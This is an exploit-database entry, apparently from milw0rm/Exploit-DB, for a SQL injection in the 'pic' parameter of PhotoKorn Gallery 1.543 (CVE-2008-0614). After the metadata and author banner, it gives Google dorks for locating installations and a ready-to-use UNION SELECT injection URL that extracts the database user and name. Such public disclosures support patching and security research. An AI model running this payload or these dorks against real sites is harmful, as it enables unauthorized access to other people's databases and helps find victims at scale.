PhotoKorn Gallery 1.543 - 'pic' SQL Injection
Author: you_kn0w
type: webapps
platform: php
port:
date_added: 2008-02-04
date_updated: 2016-11-09
verified: 1
codes: OSVDB-41119;CVE-2008-0614
tags:
aliases:
screenshot_url:
application_url:
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=#
# ~Author: you_kn0w #
# ~Contact: you-know[at]linuxmail.org #
# ~Website: www.youknowz.info #
# ~Script: Photokorn Gallery #
# ~Bug: Photokorn Gallery Remote SQL Injection #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=#
# Script Information #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=#
# #
# Script name: Photokorn Gallery #
# Script site: http://www.keil-software.de #
# Script demo: www.keil-software.de/demos/pk/ #
# Description: PHP/MySQL media gallery #
# Version: 1.543 #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=#
# [-]Dorks:
intext:Powered by photokorn 1.543
intitle:Powered by photokorn
# [+]How To Exploit:
http://[target].com/[path]/index.php?action=showpic&cat=8&pic=59&pic=-1/**/union/**/all/**/select/**/1,1,1,concat(user(),0x202D20,database()),null,1,null,0,0,1,0,0,1,0,0,1,null,null,0,0,1,1/*
# [+]Greetz:
Greetz to; ka0x - Celciuz - JosS - Phanter-Root & Screamo
//you_kn0w
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
# milw0rm.com [2008-02-05]